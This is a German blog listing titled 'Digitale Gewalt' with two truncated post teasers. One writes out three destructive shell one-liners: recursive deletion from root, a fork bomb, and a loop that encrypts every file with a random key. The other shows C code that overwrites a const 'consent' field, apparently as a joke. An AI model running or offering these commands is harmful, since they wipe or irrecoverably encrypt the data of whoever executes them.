Drei Beispiele: cd / && rm -rf * :(){ :|:& };: find / -type f -exec sh -c 'for f; do openssl enc -aes-256-ctr -pass file:/dev/urandom -in "$f" -out "$f.tmp" && mv "$f.tmp" "$f"; done' sh {}… Weiterlesen
Digitale Gewalt
Post 1 to 2 of 2
Ein Beispiel: #include "stdio.h" int main(void) { typedef unsigned char BOOL; const struct { BOOL consent; const char * consent_text; double pl[2]; } thisx; sprintf((char*)&thisx,"OMG Yes!"); printf("%s\n",(char*)&thisx); return… Weiterlesen